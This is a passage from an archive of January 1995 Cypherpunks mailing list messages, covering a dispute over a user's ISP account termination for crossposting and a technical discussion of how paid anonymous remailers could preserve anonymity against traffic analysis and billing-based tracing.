so) of my dear friends on the Cypherpunk List. 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 11:24:21 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: SysAdmin of the year
In-Reply-To: <199501061846.NAA26994@bb.hks.net>
Message-ID: <Pine.3.89.9501061347.C13661-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Aren't ya glad 94's over with?
He was in a big hole as 95 started.

His machine was being hacked routinely.
Nobody on the Web visited the site.

I just like PGP.
I believe it to be the nicest program anywhere.
It has lots of everyday uses, even you used it.

And when I crosspost a help note to .1% of Usenet,
and lose 4 days of good postings, everyone loses.

Till of course the story is told, for all to know.

Love Always,

Carol Anne

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM

On Fri, 6 Jan 1995 anonymous-remailer@shell.portal.com wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> > > According to Carol Anne Braddock: 
> 
> > His name is Michael Horwath, root@winternet.com
>               ^^^^^^^^^^^^^^^
> 
> > [icicle.winternet.com] 
> > Login name: carolann  			In real life: CarolAnne Braddock
> > Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
> > Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
> > New mail received Thu Jan  5 21:16:23 1995;
> >   unread since Mon Jan  2 13:18:25 1995
> > Plan:
> > This account has been disabled permanently.
> 
> 
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBLw2PxioZzwIn1bdtAQEgggF+ImxhTJlTtuMMJglmt3z/EriU0W2KisJZ
> kr+JZeyf2iPyi5O/xsoHNWR/jHaYtE34
> =wNlp
> -----END PGP SIGNATURE-----
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dwomack@runner.utsa.edu (Dave)
Date: Fri, 6 Jan 95 11:35:16 PST
To: cypherpunks@toad.com
Subject: Carol Anne - C'Punk Poster Person?
Message-ID: <9501061935.AA14193@runner.utsa.edu>
MIME-Version: 1.0
Content-Type: text/plain


It occurs to me that Carol's problem may well be of
considerable interest to c'punks and free speechers
everywhere.  Not that I favor spam or it's derivatives -
but Cancelmoose and others define spam as *_50_* or
more groups, esp. without crossposting.

My basis for saying that Carol's situation is
of interest is ---- as the net becomes more vulnerable
to regulation, who among is immune to a quick
cancellation of account?  For something such as,
say, the irresponsible (and antisocial?) advocacy
of crypto?  If an account can be chopped for 10
posts, where is the bottom limit?  5 perhaps? 2 maybe?
1 post that the sys-admin disagrees with?

Developing the idea, and combining it with for-profit
remailers...what would be wrong with a provider offering
a unix shell based account, with the option of registering
the account under a nym - and with finger user switchable
from on to off and back again?  The login ID would also
be unconnected to the name.  Frankly, none of this seems
that radical...our friend, America On Line has some of
these characteristics!  Various  'anti-true spam'
strategies could be used to prevent massive postings
of Make Money Etc...But instead of a remailer, an
actual *_system_* would be used.  Payments could be
by electronic invoice and money orders...

Any thoughts on this?

Dave



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 6 Jan 95 10:40:21 PST
To: cypherpunks@toad.com
Subject: SysAdmin of the year
Message-ID: <199501061846.NAA26994@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> > According to Carol Anne Braddock: 

> His name is Michael Horwath, root@winternet.com
              ^^^^^^^^^^^^^^^

> [icicle.winternet.com] 
> Login name: carolann  			In real life: CarolAnne Braddock
> Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
> Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
> New mail received Thu Jan  5 21:16:23 1995;
>   unread since Mon Jan  2 13:18:25 1995
> Plan:
> This account has been disabled permanently.


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw2PxioZzwIn1bdtAQEgggF+ImxhTJlTtuMMJglmt3z/EriU0W2KisJZ
kr+JZeyf2iPyi5O/xsoHNWR/jHaYtE34
=wNlp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@mm.com>
Date: Fri, 6 Jan 95 11:43:17 PST
To: Mike Horwath <drechsau@winternet.com>
Subject: Re: Files and mail
In-Reply-To: <m0rQCCt-000Sx3C@icicle.winternet.com>
Message-ID: <Pine.3.89.9501060725.A12518-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Mr. Horwath,

A written reply will suffice.
You have my permission to make all of my files world readable.
You can put them in the ftp site.

Upon receipt of notice, they will be removed within 24 hours,
and you will recieve a signed PGP statement with the new key,
stating that the files have been removed. Other Winternet users have
already gone to my defense, and copied all of the world readable
material anyway. And the whole account might as well be, too.

Please do not forward any mail here. You will better serve yourself 
bouncing the letter back to the sender and informing them of my new
address. If I find forwarded mail in my mailbox, I will print hard
copies and visit the Attorney General's Office and file a complaint
under the Stalking laws of the State of Minnesota.

And please...deactivate my WWW pages. I was astounded to find out
that during the suspension, they continued to remain active, as I
learned in the office Wednesday. That was (and still is) stealing my 
net.web.goodwill, and creating a falsehood amongst other users.

My WWW Pages have found a nice, new, warm sunny home in Austin, Texas.

I spent six full hours making a personal appearance, at great 
personal expense, to the Winternet Office to resolve the situation.

My original reply still sits in suspended composition in my mailer. I 
wasted not a nano-second in preparing my reply to the posting. In legal
point of fact, the poster is violation of Minnesota State Law. He has
no legal jurisdiction whatsoever.

I did not take days to "investigate", nor cite that other things such as
"my machines being hacked" and "I'll do it when I'm ready to do it,".

I was a simple complaint. It had no validity. Crossposting an article to
.1% of the Usenet News Groups does not by the very statistic constitute 
spam. (And I own two shares of Hormel Corp, so I do know what SPAM (tm) is.

As was pointed out in alt.current-affairs.net-abuse
The complainer didn't fully read said article. It was timely.(and still is)
The crossposting wasn't wasting resources.
It is of no one's concern the actual groups posted. 
They have the right and ability to respond.
I asked for no money. I did not stand to profit by the posting.
The person who started the whole thing was pretty heavily chastised,
by the readers of his own news group.

A fast "K" was all that any individual needed for this article.

No, Mr. Horwath, you are "way out-of-bounds" this time.
And as the time cronology unveils itself, I am sure that 
will be shown to be a very truthful, factual statement.

Dangerous precedents were set here. I will not rest until the 
whole of the Internet knows and is aware of the situation.

Signed
Carol Anne Braddock
Friday January 6th, 1995 9:40 A.M.

On Fri, 6 Jan 1995, Mike Horwath wrote:

> You are welcome to your files and mail, I will pack everything up for
> you as you left it, including your FTP area.
> 
> I expect you to try to reach me today in the afternoon at my office and
> I will fully explain why your account was deleted, with full detail as
> to why.
> 
> I do appreciate the work you did on the shirts for Winternet.  I don't
> appreciate the harassment you have already tried to bring upon me.
> 
> When we talk, I think you might understand why this was done.  If you do
> not, then I feel bad, as I must then not be making myself clear.  But
> no matter what, this was policy that you chose to break even after I 
> had talked to you about it.  More on this when we talk.
> 
> Good luck at your new provider, Larry Leone is an old user of mine and
> seems to be a good guy, even if a little quiet on the newsgroups :)
> 
> A copy of this letter is also going to your new admin so that he knows
> what is going on.
> 
> Larry, Carol Anne was using about 11.5MB of disk that will be moving
> over from Winternet to MM.
> 
> Also, how have you been anyway?  Been awhile since I saw you.  Oh, and
> could you install identd on your system?  Get back to me on anything,
> or with questions.
> 
> -- 
> Mike Horwath    IRC: Drechsau    LIFE: Lover     drechsau@winternet.com
> Winternet:  info@winternet.com              root@jacobs.mn.org <- Linux!
> Twin Cities area Internet Access:  612-941-9177 for more info
> Founding member of Minnesota Coalition for Internet Accessibility
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 6 Jan 95 13:51:51 PST
To: dwomack@runner.utsa.edu
Subject: RE: Carol Anne - C'Punk Poster Person?
Message-ID: <9501062152.AA05672@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Dave  <dwomack@runner.utsa.edu>

It occurs to me that Carol's problem may well be of
considerable interest to c'punks and free speechers
everywhere.  Not that I favor spam or it's derivatives -
but Cancelmoose and others define spam as *_50_* or
more groups, esp. without crossposting.
...........................................................

It occurs to me that Carol's problem is personal, that we don't know 
all of the details, that the sysadmin responsible is in contact with 
her and appears quite willing to communicate on the episode, to explain 
to her the reason for the action taken as well as being willing to 
provide to her opportunity to retrieve all of her email, etc. as well 
as to talk to her new provider and explain once again the details of 
the situation.

If the sysadmin's action was the result of regulation, then it would be 
apropos for a wider range of interest, but it appears to be the 
decision of an individual sysadmin acting on his own prerogative.   
Objections could be sent to him personally, unless someone wanted to 
make him answer to the list for his judgement and decision, and spend a 
lot of time arguing with him about it.

Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 6 Jan 95 11:19:04 PST
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: Remailer Abuse
In-Reply-To: <Aj3HRaf0Eyt5ExIApP@nsb.fv.com>
Message-ID: <199501061911.OAA08861@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


nsb wrote:

| Excerpts from mail: 5-Jan-95 Re: Remailer Abuse db@Tadpole.COM (1180*)

| > Heh. An anonymous remailer paid for by credit card... there'd
| > have to be an additional level of indirection for it to work,

| Again, this comes down to definitions of anonymity.  In this case, if
 [...]
| two different countries.  For my part, I figure that if the government
| of Finland and the government of the US can actually agree that it's so
| important to force the sacrifice of anonymity in a given case that
| they're both willing to coerce companies under their jurisdiction, they
| will probably have a very good reason for doing so.   Maybe I'm too
| trusting, though.)

	Its also a matter of analysing your threats.  There may be
employees of one or more companies involved who might sell
information.  Then again, if you're selling plans of the B2 to the
Iraqis, the US & Norwegian governments might collude to track you
down, (and in the process, read a lot of other messages.)

| Excerpts from mail: 5-Jan-95 Re: Remailer Abuse wcs@anchor.ho.att.com (2028)

| > Beyond that, though, are some traffic analysis problems -
| > remailers require a fair bit of traffic to be useful, and unless
| > you receive a reasonable amount of encrypted traffic, 
| > and support encrypted email for purchasing remailer service
| > and other merchandise, an eavesdropper would have a fairly good source
| > of traffic data on your remailer users, especially since buying and using 
| > remailer service requires two messages within an hour or so.

| Well, I think low-volume remailers are always a bit vulnerable to
| traffic analysis attacks, aren't they?    One thing you could do is
| build a variable time-delay into the remailer, to make it harder to
| correlate messages coming in with those going out.  To take paranoia a
| step further, you could allow people to encrypt their mail TO an
| anonymous remailer with the remailer's public key, and let the remailer
| send it out unencrypted.

	Time delay does not guarantee mixing, which is the intent of
time delay schemes.  Might as well mix directly, since thats what
you're trying to accomplish.  Someone (I think it was Hal) wrote up a
message describing the math involved.  And I don't think encrypting
the various parts of a remailer chain is very paranoid; I don't
particularly trust the remail ops not to read my mail.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 6 Jan 95 14:19:53 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: for-pay remailers and FV (Was Re: Remailer Abuse)
In-Reply-To: <ab336511060210049dfa@[132.162.201.201]>
Message-ID: <Pine.3.89.9501061416.A7987-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Jonathan Rochkind wrote:

> Hmm. Maybe I don't completely understand how this is going to work, but
> won't _every_ remailer in the chain need to know your FV billing account?

First remailer knows you and your FV billing account.  Charges you
its own fee and the fee for all for profit remailers in the list.
(The envelope states what this fee is going to be) 

Second remailer charges first remailer.

Third remailer charges second remailer.

If the postage on the envelope is insufficient to cover all
the for profit remailers the message passes through, it gets
bounced or dropped.

In principle it could work, 

But blinded digital cash makes it a lot easier.  (blinded 
postage stamps)

I would not try to implement it.  Too much like hard work, for
an unnecessarily complex solution.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 11:16:09 PST
To: Nathaniel Borenstein <cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <ab3346570002100465bb@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:28 AM 01/06/95, Nathaniel Borenstein wrote:
>Again, this comes down to definitions of anonymity.  In this case, if
>you start from the silly assumption that the anonymous remailer actually
>keeps records that correlate messages to payment mechanisms, Doug is
>right, but barely.  To break the anonymity, you'd need collusion between
>the operator of the anonymous remailer AND First Virtual, because the
>former knows which account sent a message, and the latter knows who that
>account belongs to.  (And before you tell me that this sounds a lot like

While this might be secure enough for some people, it is important to note
that it definitely is less secure then the current free remailer net.
Currently, if I send my message through 10 remailers, many more then just
two of the operators need to cooperate in order to get my true identity.  I
think that at least 8 or 9 of them do, actually.
In a First Virtual payment-scheme remailernet, no matter how many remailers
I send my message through, any _one_ operator, together with First Virtual,
can burst my anon bubble.

I suppose this still might be enough security for some people.  After all,
penet is enough security for some people.  But I'd guess that most people
using cypherpunks remailers instead of Julf's penet remailer aren't going
to be willing to settle for it, because it doesn't give you very much more
security then penet.  My trust of Julf, who has an amazingly good
reputation on the net and furthermore isn't in the U.S. (and presumably
isn't subject to U.S. government coercion), certainly isn't any less then
my trust of First Virtual. And if I'm still sending through 10 remailers,
which I'd be doing for traffic analysis reasons, any _one_ of them,
together with FV, can compromise me.  Weakest link in the chain.  Which
means my risk _rises_ with increased remailer chain length. If I was
willing to accept that level of risk, I'd just use penet which is much more
convenient.

The First Virtual method does seem possible for Julf's remailer, since
users are pretty much already trust Julf completely, so the Julf+FV system
isn't any less secure then the just Julf system.   But it's just not
anonymous enough for cypherpunks-style remailers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "david d `zoo' zuhn" <zoo@armadillo.com>
Date: Fri, 6 Jan 95 12:38:39 PST
To: cypherpunks@toad.com
Subject: Re: Carol Anne - C'Punk Poster Person?
Message-ID: <199501062040.OAA06369@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't think there's much of a case for 'poster child' status involved.  

Users on the Winternet systems (of which I happen to be one) sign an
Agreement stating that they'll abide by Netiquette whenever using internet
services.  Failure to do so can result in termination of service.  This is
Mike's way to limit the amount of time he has to spend dealing with users
who generate flamage.  There was [apparently] another issue involving
reselling of service that I don't have details on, but which is likely to
be related.

Where's the censorship?  I don't see it.  CarolAnne is free to make
whatever statements she likes (since she has service from another
provider).  The New York Times doesn't have to allow me to put an article
on page one (much as I might wish to do so).  That's not censorship either.
No one is obligated to provide a soap box for someone to stand on.

This is a free market issue, not free speech.  Since there is competition
in the local area, people are free to choose whichever provider they like.
Some have more explicit AUP's than others.  Some probably haven't even
considered the issue.  There's no one crying "Foul!  Begone from the net
forever".  THAT would be censorship.  But this is a case of "You're not
following my rules.  Be gone from my machine."

I've got my own setup at home, mostly independent of network provider and
becoming moreso as time progresses, to prevent J. Random Sysadmin from
cutting me off arbitrarily.  It costs more money this way, but that's not
entirely unreasonable.  

I'd rather see a market of half a dozen or more providers in any given
area, each mostly independent, providing a number of choices as to service
levels and policy expectations, instead of a monolithic Micro$oft (or AOL
or CI$ or Delphi or etc) "We ARE the Internet" where censorship (in the
traditional definition of someone vetting any public [or private!]
postings) is much more common.

I could see a market for service where someone who decided to armorplate
their machine could provide service to those who persist in doing
"net.stupid.things".  Provide anonymous accounts on that machine, and
remailer accounts, and such, and then stand back and ignore all of the
flamage that will come the way of root|postmaster|usenet|whatever.

[ Personally, I'd likely put that domain into my global killfiles, but
  that's selective reading, not censorship.  ]

[ More disclaimers -- I don't represent Winternet in any way, nor Mike
  Horwath nor CarolAnne Braddock.  I have no connection with Winternet
  except as a customer.  I speak solely for myself and Armadillo Zoo
  Enterprises. And I'm not afraid of an electronic stalking prosecution. ]


  -- 
  -  david d `zoo' zuhn  -| armadillo zoo software -- St. Paul, Minnesota
  --  zoo@armadillo.com --|   unix generalist (and occasional specialist)
  ------------------------+   http://www.armadillo.com/ for more information
    pgp key upon request  +----------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 6 Jan 95 12:08:18 PST
To: jrochkin@cs.oberlin.edu
Subject: Re: Remailer Abuse
In-Reply-To: <ab3346570002100465bb@[132.162.201.201]>
Message-ID: <m0rQL1Q-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 6 Jan 1995 14:19:07 -0500
   From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)

   In a First Virtual payment-scheme remailernet, no matter how many remailers
   I send my message through, any _one_ operator, together with First Virtual,
   can burst my anon bubble.

Why?  Why wouldn't the FV remailers use settlements?  At the end of
the month, everyone settles accounts in re who gets what fraction of
what.  No logs are needed other than counters.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bshantz@spry.com
Date: Fri, 6 Jan 95 15:35:54 PST
To: cypherpunks@toad.com
Subject: The Carol Anne Controversy
Message-ID: <199501062336.PAA12592@homer.spry.com>
MIME-Version: 1.0
Content-Type: text/plain


C'Punks,

Well, folks, this has certainly been an exciting SPAM/FLAME war we've been 
watching.  I've personally enjoyed skipping a good portion of the text of the 
messages and just watching the headers continue to grow in size as more and 
more people have been added to the CC list.  Although, I must admit that I 
enjoyed the Winternet Sysadmin's Rebuttal.

Between this and Matt's article about being an international arms courier 
(Great Article Matt!!!) I've discovered my own answer to the Soap Operas I 
miss while I'm at work every day.

Think I'll go make some popcorn and sit back to watch the fireworks some more.

-- Brad






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 13:35:58 PST
To: Russell Nelson <nelson@crynwr.com>
Subject: Re: Remailer Abuse
In-Reply-To: <m0rQL1Q-0008ZFC@crynwr.crynwr.com>
Message-ID: <Pine.3.89.9501061536.D13809-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Yes Russell, you hit the nail on the head. It's all about trust.

On Fri, 6 Jan 1995, Russell Nelson wrote:
> what.  No logs are needed other than counters.
> 
> -- 
> -russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
> Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
> 11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
> Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?
> 

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 12:39:26 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <ab33592305021004d062@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:12 PM 01/06/95, Russell Nelson wrote:
>   Date: Fri, 6 Jan 1995 14:19:07 -0500
>   From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
>
>   In a First Virtual payment-scheme remailernet, no matter how many remailers
>   I send my message through, any _one_ operator, together with First Virtual,
>   can burst my anon bubble.
>
>Why?  Why wouldn't the FV remailers use settlements?  At the end of
>the month, everyone settles accounts in re who gets what fraction of
>what.  No logs are needed other than counters.

Oh, you're suggesting that I'd only actually pay the first remailer on my
chain, and at the end of the month he'd pay some of the money I (and
others) paid him to all of the other remailers his transacted with over the
month?  I hadn't thought of that, but now that I do, I can see several
problems arising.

1) The initial remailer has no way of knowing how many subsequent links
there are in the chain, and so doesn't know if I've paid him enough to
reimburse everyone else.  I can easily cheat. He also doesn't know _who_
the subsequent chains are. He can deduct one "stamp" from the amount, and
forward the rest on to the next remailer, and trust them to do the same,
but if I'm cheating there won't be enough to make it to the end of the
chain.  Both of these facts (initial op doens't know how long the chain
will be, or who will be on it) are essential to the security I get from
using anon remailers, so even if they could be "fixed", it would be bad to.


2) This system requies a good deal of cooperation and organization among
remailer operators. They've got to agree to send each other the proper
amount of money, they've got to set up policies for what the proper amount
of money is, they've got to stay in relatively constant contact to keep
everything running smoothly.   In effect, a remailers trade association is
created, and if I want to use any of the remailers in that group, I've got
to use _only_ remailers in that group in my chain.  I'd rather use a chain
of remailers which aren't associated that closely, hopefully don't even
know each other, and possibly some of which only exist for a short period
of time (guerilla remailers, a risk if I'm paying, in that I can't
neccesarily trust them not to steal my money, but if the money I'm paying
is something like $.05 to each remailer, not a real serious risk).
Assuming that there will be some free as well as some charging remailers,
I'd also like to use some of each in my chain.  I see some problems with
the Remailer Trade Association allowing those transactions to happen.
(will they accept incoming mail from a non-affilated remailer, which surely
won't be paying them at the end of the month?  Surely not, which means if I
use any affilated remailers in my chain, no affilated remailers can come
afterwords. So all affilated remailers I'm using have to come before all
non-affiliated remailers, which is an undesirable restriction which could
aid traffic analsysis. If there are several affiliations, things get even
more complicated.)

There are probably other problems too, that I haven't thought of yet.  An
FV-style system doesn't seem to do the trick.  And it isn't an issue of
certain sacrifices you have to make in order to set up for-pay remailers,
as a Chaum digicash based for-pay remailer system would work admirably, and
none of my objections would apply to it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 6 Jan 95 15:57:26 PST
To: cypherpunks@toad.com
Subject: Re: floating point crypto?
In-Reply-To: <v01510105ab333d693cc6@[199.0.65.105]>
Message-ID: <199501062358.PAA22404@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> rah@shipwright.com (Robert Hettinga) writes:
> Nonetheless, I *am* thankful to Jim Gillogly, who sent me a great bunch of
> stuff about what the pentium.whistleblower, Dr. Nicely, was working on. Jim
> said he got it out of WWW, and maybe he'll post the URL here and that will
> be that. Nicely was working with finding multiple primes: Prime twins,
> prime triplets, etc.

The page is titled "The Pentium Papers": http://www.mathworks.com/README.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 6 Jan 95 13:15:51 PST
To: nelson@crynwr.com
Subject: Re: Remailer Abuse
In-Reply-To: <28351.789422888.1@nsb.fv.com>
Message-ID: <Ij3P7Kn0Eyt5AxI6Zx@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 6-Jan-95 Re: Remailer Abuse nelson@crynwr.com (779)

>    From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)

>    In a First Virtual payment-scheme remailernet, no matter how many remailers
>    I send my message through, any _one_ operator, together with First Virtual,
>    can burst my anon bubble.

> Why?  Why wouldn't the FV remailers use settlements?  At the end of
> the month, everyone settles accounts in re who gets what fraction of
> what.  No logs are needed other than counters.

I hate to say it, because I generally tend to take the pro-FV side of
most arguments :-), but I think Jonathan's closer to the mark in this
case.  If mail goes through ten remailers, and they ALL charge via First
Virtual, then the last one in the chain won't have to know who you are,
but it will have to know your FV billing account.  Thus it, together
with FV, have enough information to break anonymity.

This is NOT the same as saying that ANY one operator, together with FV,
can burst anonymity; it means that the last one + FV can do so.  I
think, however, that you'd need to break into the last one to get enough
information to allow the next-to-last one to figure out the right FV-id.
 (This assumes that you're tracing the message from its ultimate
destination, not monitoring traffic as it passes through the remailers
-- in the latter case, Jonathan is probably right on the mark.)

Personally, for my taste this is sufficiently anonymous for any
reasonable purpose.  HOWEVER, I can imagine how to make it even more
anonymous.  Imagine that there are ten for-profit anonymous remailer
operators who form an "anonymous remailers consortium".  Each of them
operates TWO remailers, a for-pay one and a free one, but the free one
will only take things that have come directly via some consortium
member's anonymous remailer, so your message has to be paid for once, at
the entry point to the overall system.    Now you can build up a chain
that STARTS with a payment, but then threads its way through a bunch of
less traceable systems. where the operators can't give tracing
information even under court order.  The consortium members would
probably have to agree to some revenue sharing arrangements, but you
could make this work.  

I think this level of engineering is overkill -- for my personal level
of paranoia, I would settle for a single for-pay anonymous remailer
located in a country with very different laws than those that governed
the payment system.    Such a system would probably be "breakable" for
the legal pursuit of genuine terrorists, but not for government
harassment of political dissidents, closet gays from conservative
countries, pornographers, etc.   I guess my basic assumption is that
while any given government can not be trusted with too much power, if
you can't distribute your trust for such things across several very
different governments, human freedom may be a lost cause in the long run
anyway.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 16:10:51 PST
To: cypherpunks@toad.com
Subject: Re: Files and mail
In-Reply-To: <m0rQMsX-000SwxC@icicle.winternet.com>
Message-ID: <199501070010.QAA02210@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


drechsau@winternet.com (Mike Horwath) carefully explains all the
reasons why is it better to have a Netcom account than a
Winternet account!

 > I was going to be in, I decided to rest instead.  So sue me
 > for it.

Big providers like Netcom have many employees and many machines.
Things do not screech to a halt when "the guy who owns the
machine" takes a mental health day. :)

 > Talk about net.good.will...you stole service after it was
 > suspended.

Free service offered to the public cannot be stolen, even by
prior dissatisfied customers.  Big providers like Netcom don't
care if someone they don't like logs onto the machine again as
"guest".

 > Tuesday, after being up for 20+ hours and getting a couple
 > hours sleep, you call ... Again, sue me, this time for being
 > tired.

Service at big providers like Netcom doesn't slack off when "the
guy who owns the machine" misses his nap...

 > Wednesday, I was going to be into work, which you assumed I
 > would be, ... I decided I was going to take that day off ...

...or when "the guy who owns the machine" goes fishing...

 > The machine being down was not used as an excuse, but it is
 > hard to operate like we used to with only one user machine.

...or when "the machine" is broken.

 > That is 2 counts in 2 days (notified on monday, early, of
 > the spamming, notified on wed of the mass unsolicited
 > mailings).  Sorry, someone had to put their foot down, and
 > it happened to be us.

Big service providers like Netcom don't interfere with customer
use of the resources they sell, except when network functionality
is impacted.  Even in such cases, they try to reach an
understanding with the user, and terminate accounts only as a
last resort.  Accounts don't vanish when "the guy who owns the
machine" decides to throw a tantrum.

 > It was innapropiate for the groups that you posted to.

Big providers like Netcom don't pass editorial judgment on the
content of material posted by their customers.

 > Sorry Carol Anne, but this is a system I administer and I
 > use the AUP to protect all of us accross the 'net.

I am sure we will all sleep more soundly knowing that Mike
Horwath and his tiny pimple of a machine on the Internet are
"protecting" us.

 > We had talked about the winternet t-shirts and how we would
 > use the work you did and the monies you would receive as
 > payment.

Big providers like Netcom don't make silly little deals with
customers for T-shirts...

 > Well, no t-shirts have gone out and at this time, I will be
 > cancelling all orders for them and will redesign them and
 > have them produced externally to what you have done.  This
 > is what happens when you hold something over someones head.

...or cancel those agreements out of spite when they don't get
everything done their way.

You know, I used to use BBS systems a great deal before large
providers like Netcom began offering personal accounts with
Internet access at reasonable rates.  A BBS is about as far from
a common carrier as one can get, and many Sysops disclaim all
your rights under the ECPA, read private mail, forbid the use of
PGP, decide what opinions may be expressed on various issues, and
boot off any user who questions anything they do.  Since the
Sysop owns the machine, they are legally within their rights to
act like this, and as long as there are enough users who will put
up with their behavior, they can run a system.

Now that Unix boxes are not much more expensive than PCs used to
be, every asshole in the world who played Sysop on a BBS now
envisions himself as Sysadmin of an ISP.  So you have an
infestation of tiny service providers, running on toy machines,
that coast along for a few years until the person running them
either goes bankrupt or gets bored.  I certainly wouldn't
subscribe to one of these services, because the management
mentality and problematical service most of them provide is
exactly what I came to Netcom to get away from.

Quite frankly, I don't see why Carol doesn't just get a Netcom
account and stop quibbling with this twit.  Stop letting him
waste any more of your time and let him play his administrative
power games with newbies who don't know any better.

My two cents.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drechsau@winternet.com (Mike Horwath)
Date: Fri, 6 Jan 95 14:12:55 PST
To: carolann@mm.com
Subject: Re: Files and mail
In-Reply-To: <Pine.3.89.9501060725.A12518-0100000@downburst.mm.com>
Message-ID: <m0rQMsX-000SwxC@icicle.winternet.com>
MIME-Version: 1.0
Content-Type: text


[This is hopefully going to be my only message on this matter, questions
or comments, just reply to me directly]

> A written reply will suffice.
> You have my permission to make all of my files world readable.
> You can put them in the ftp site.

Since you are posting this to so many people, they can all see my
reply.

And this is a written reply :)

> Upon receipt of notice, they will be removed within 24 hours,
> and you will recieve a signed PGP statement with the new key,
> stating that the files have been removed. Other Winternet users have
> already gone to my defense, and copied all of the world readable
> material anyway. And the whole account might as well be, too.

Fine, when I have things packed up, they will be moved and you will
be notified.

> Please do not forward any mail here. You will better serve yourself 
> bouncing the letter back to the sender and informing them of my new
> address. If I find forwarded mail in my mailbox, I will print hard
> copies and visit the Attorney General's Office and file a complaint
> under the Stalking laws of the State of Minnesota.

You can either take the alias in my alias database or have no forwarding
address left, that is your choice.  We are courteous enough to forward
